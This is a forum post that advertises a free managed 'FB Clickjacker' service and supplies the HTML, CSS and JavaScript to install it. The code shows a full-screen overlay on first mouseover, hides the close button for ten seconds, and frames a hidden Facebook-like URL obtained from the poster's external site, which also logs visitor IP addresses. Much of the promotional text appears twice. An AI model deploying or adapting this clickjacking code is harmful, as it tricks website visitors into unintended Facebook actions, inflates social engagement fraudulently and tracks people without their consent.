mailicreate
Junior Member
- Jan 17, 2015
- 129
- 28
Following bulky PM's and countless requests for this script via my old thread
http://www.blackhatworld.com/blackh...-facebook-auto-like-auto-share-new-trick.html
I am offering a managed free Panel for FB Clickjacker and setup of the FB clickjacker.
1. Free 800-1200 real Likes per month or 14,000 Likes per year (+/- 200 likes per month).
2. Visitors IP information, time visited etc,.
3. Must Own website (Must have real FB traffic on own website. BOT traffic will not work here)
4. Works on Desktop / Mobile / Tablet
5. Cost: $0 with some Skype support (I work fulltime so timing can be bad).
Register with your Facebook url and website url on http://www.ilikefb.x10.mx . I will setup the free clickjacker individually for each user (handcrafted). So please bear with me while I process each individual user's request. Any questions ask here or PM.
1. Register at http://www.ilikefb.x10.mx
2. Create your clickjacker profile.
3. Admin will message you the customized clickjacker script for your website.
4. Update website with code and run clickjacker upto 45-75 clicks per day.
5. Next day Rinse and repeat.
Place this within the head tag of the html file.
Place this in the body tag. Modify the <body> as given with the onmouseover attribute as given below:
http://www.blackhatworld.com/blackh...-facebook-auto-like-auto-share-new-trick.html
I am offering a managed free Panel for FB Clickjacker and setup of the FB clickjacker.
1. Free 800-1200 real Likes per month or 14,000 Likes per year (+/- 200 likes per month).
2. Visitors IP information, time visited etc,.
3. Must Own website (Must have real FB traffic on own website. BOT traffic will not work here)
4. Works on Desktop / Mobile / Tablet
5. Cost: $0 with some Skype support (I work fulltime so timing can be bad).
Register with your Facebook url and website url on http://www.ilikefb.x10.mx . I will setup the free clickjacker individually for each user (handcrafted). So please bear with me while I process each individual user's request. Any questions ask here or PM.
1. Register at http://www.ilikefb.x10.mx
2. Create your clickjacker profile.
3. Admin will message you the customized clickjacker script for your website.
4. Update website with code and run clickjacker upto 45-75 clicks per day.
5. Next day Rinse and repeat.
Place this within the head tag of the html file.
Code:
<style>
.black_overlay{
display: none;
position: fixed;
top: 0%;
left: 0%;
width: 100%;
height: 100%;
background-color: black;
z-index:1001;
-moz-opacity: 0.6;
opacity:0.8;
filter: alpha(opacity=60);
}
.white_content {
display: none;
position: fixed;
top: 25%;
left: 35%;
width: 320px;
height: 250px;
padding: 16px;
border: 16px solid #111;
background-color: white;
z-index:1002;
overflow: hidden;
}
.no-close .ui-dialog-titlebar-close {display: none }
</style>
Place this in the body tag. Modify the <body> as given with the onmouseover attribute as given below:
Code:
<body onmouseover="onHover(this)">
<script>
function onHover(element) {
if(element.alreadyHovered == null) {
document.getElementById('light').style.display='block';
document.getElementById('fade').style.display='block';
document.getElementById('tohide').style.display='none';
setTimeout("hideit()",10000);
element.alreadyHovered = true;
}
}
function hideit(){
var o = document.getElementById('tohide');
o.style.display = 'block';
}
</script>
<div id="light" class="white_content">
<button id="tohide" style="float:right; position:absolute; bottom:0px;" onclick="document.getElementById('light').style.display='none';
document.getElementById('fade').style.display='none';" >X</button>
</br>
<iframe src="[COLOR=#ff0000][B]Get your clickjacker URL from admin. (Step 3 above)[/B][/COLOR]"></iframe>
</div>
<div id="fade" class="black_overlay">
</div>
Last edited: